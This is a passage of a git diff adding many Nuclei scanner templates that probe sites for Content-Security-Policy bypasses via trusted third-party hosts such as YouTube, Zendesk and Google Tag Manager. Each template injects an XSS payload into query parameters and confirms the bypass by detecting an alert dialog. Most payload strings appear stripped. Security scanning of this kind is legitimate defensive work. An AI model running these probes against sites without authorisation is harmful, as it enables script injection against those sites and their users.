+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,youtube
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: suggestqueries_youtube_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "suggestqueries_youtube_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/support-zendesk-csp-xss.yaml b/dast/vulnerabilities/xss/csp/support-zendesk-csp-xss.yaml
new file mode 100644
index 00000000000..6e2c9946b9a
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/support-zendesk-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: support-zendesk-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Zendesk Support
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,zendesk
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: support_zendesk_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "support_zendesk_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/swiftype-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/swiftype-api-csp-xss.yaml
new file mode 100644
index 00000000000..85452b5d1d9
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/swiftype-api-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: swiftype-api-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Swiftype API
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,swiftype
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: swiftype_api_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "swiftype_api_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/sync-im-apps-csp-xss.yaml b/dast/vulnerabilities/xss/csp/sync-im-apps-csp-xss.yaml
new file mode 100644
index 00000000000..9d3615ae106
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/sync-im-apps-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: sync-im-apps-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via IM Apps Sync
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,im-apps
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: sync_im_apps_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "sync_im_apps_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/tagmanager-google-csp-xss.yaml b/dast/vulnerabilities/xss/csp/tagmanager-google-csp-xss.yaml
new file mode 100644
index 00000000000..60413f9387e
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/tagmanager-google-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: tagmanager-google-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Google Tag Manager
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,google
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: tagmanager_google_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "tagmanager_google_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/tcr9i-openai-csp-xss.yaml b/dast/vulnerabilities/xss/csp/tcr9i-openai-csp-xss.yaml
new file mode 100644
index 00000000000..1cd217b9730
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/tcr9i-openai-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: tcr9i-openai-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via OpenAI TCR9I
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,openai
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: tcr9i_openai_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "tcr9i_openai_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/thehive-shopify-csp-xss.yaml b/dast/vulnerabilities/xss/csp/thehive-shopify-csp-xss.yaml
new file mode 100644
index 00000000000..7b8db0afe94
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/thehive-shopify-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: thehive-shopify-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Shopify TheHive
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,shopify
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - '
![](x)
'
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: thehive_shopify_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "thehive_shopify_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/thiscanbeanything-zendesk-csp-xss.yaml b/dast/vulnerabilities/xss/csp/thiscanbeanything-zendesk-csp-xss.yaml
new file mode 100644
index 00000000000..41371386464
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/thiscanbeanything-zendesk-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: thiscanbeanything-zendesk-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Zendesk ThisCanBeAnything
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,zendesk
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: thiscanbeanything_zendesk_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "thiscanbeanything_zendesk_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/tiktok-analytics-csp-xss.yaml b/dast/vulnerabilities/xss/csp/tiktok-analytics-csp-xss.yaml
new file mode 100644
index 00000000000..762cd7ef3e9
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/tiktok-analytics-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: tiktok-analytics-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via TikTok Analytics
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,tiktok
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: tiktok_analytics_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "tiktok_analytics_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/translate-google-csp-xss.yaml b/dast/vulnerabilities/xss/csp/translate-google-csp-xss.yaml
new file mode 100644
index 00000000000..ac99d5c7d23
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/translate-google-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: translate-google-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Google Translate
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,google
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: translate_google_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "translate_google_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/translate-googleapis-csp-xss.yaml b/dast/vulnerabilities/xss/csp/translate-googleapis-csp-xss.yaml
new file mode 100644
index 00000000000..d4ba9d4fe9b
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/translate-googleapis-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: translate-googleapis-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Google Translate API
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,google
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: translate_googleapis_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "translate_googleapis_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/translate-yandex-csp-xss.yaml b/dast/vulnerabilities/xss/csp/translate-yandex-csp-xss.yaml
new file mode 100644
index 00000000000..881620169ca
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/translate-yandex-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: translate-yandex-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Yandex Translate
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,yandex
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: translate_yandex_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "translate_yandex_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/tumblr-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/tumblr-api-csp-xss.yaml
new file mode 100644
index 00000000000..f0df4772dde
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/tumblr-api-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: tumblr-api-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Tumblr API
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,tumblr
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: tumblr_api_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "tumblr_api_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/twitter-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/twitter-api-csp-xss.yaml
new file mode 100644
index 00000000000..baa6e590235
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/twitter-api-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: twitter-api-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Twitter API
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,twitter
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: twitter_api_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "twitter_api_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/twitter-csp-xss.yaml b/dast/vulnerabilities/xss/csp/twitter-csp-xss.yaml
new file mode 100644
index 00000000000..fdfb51dce12
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/twitter-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: twitter-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Twitter
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,twitter
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: twitter_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "twitter_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/udgnoz7mccyaowzp-public-blob-vercel-storage-csp-xss.yaml b/dast/vulnerabilities/xss/csp/udgnoz7mccyaowzp-public-blob-vercel-storage-csp-xss.yaml
new file mode 100644
index 00000000000..5ae7610a7bb
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/udgnoz7mccyaowzp-public-blob-vercel-storage-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: udgnoz7mccyaowzp-public-blob-vercel-storage-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Vercel Storage
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,vercel
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: udgnoz7mccyaowzp_public_blob_vercel_storage_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "udgnoz7mccyaowzp_public_blob_vercel_storage_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/ug-alibaba-csp-xss.yaml b/dast/vulnerabilities/xss/csp/ug-alibaba-csp-xss.yaml
new file mode 100644
index 00000000000..93d14b06a8d
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/ug-alibaba-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: ug-alibaba-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Alibaba
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,alibaba
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: ug_alibaba_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "ug_alibaba_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/uk-indeed-csp-xss.yaml b/dast/vulnerabilities/xss/csp/uk-indeed-csp-xss.yaml
new file mode 100644
index 00000000000..2f34a9f6cfb
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/uk-indeed-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: uk-indeed-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Indeed UK
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,indeed
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: uk_indeed_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "uk_indeed_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/ulogin-csp-xss.yaml b/dast/vulnerabilities/xss/csp/ulogin-csp-xss.yaml
new file mode 100644
index 00000000000..740cc8c9b1a
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/ulogin-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: ulogin-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via ULogin
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,ulogin
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: ulogin_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "ulogin_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/unpkg-angular-csp-xss.yaml b/dast/vulnerabilities/xss/csp/unpkg-angular-csp-xss.yaml
new file mode 100644
index 00000000000..b19d7d86e78
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/unpkg-angular-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: unpkg-angular-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Unpkg Angular
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,unpkg
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - '
![](x)
'
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: unpkg_angular_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "unpkg_angular_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/unpkg-hyperscript-csp-xss.yaml b/dast/vulnerabilities/xss/csp/unpkg-hyperscript-csp-xss.yaml
new file mode 100644
index 00000000000..af132775dcf
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/unpkg-hyperscript-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: unpkg-hyperscript-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Unpkg Hyperscript
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,unpkg
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - '
'
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: unpkg_hyperscript_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "unpkg_hyperscript_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/urs-pbs-csp-xss.yaml b/dast/vulnerabilities/xss/csp/urs-pbs-csp-xss.yaml
new file mode 100644
index 00000000000..c559750d741
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/urs-pbs-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: urs-pbs-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via PBS URS
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
+ - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+ metadata:
+ verified: true
+ tags: xss,csp-bypass,pbs
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ injection:
+ - ''
+
+ fuzzing:
+ - part: query
+ type: replace
+ mode: single
+ fuzz:
+ - "{{url_encode(injection)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{injection}}"
+ internal: true
+
+headless:
+ - steps:
+ - action: navigate
+ args:
+ url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+ - action: waitload
+
+ - action: waitdialog
+ name: urs_pbs_csp_xss
+ args:
+ type: alert
+ timeout: 5000
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "urs_pbs_csp_xss == true"
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/vimeo-csp-xss.yaml b/dast/vulnerabilities/xss/csp/vimeo-csp-xss.yaml
new file mode 100644
index 00000000000..cc9de711696
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/vimeo-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: vimeo-csp-xss
+
+info:
+ name: Content-Security-Policy Bypass via Vimeo
+ author: renniepak,DhiyaneshDK
+ severity: medium
+ reference:
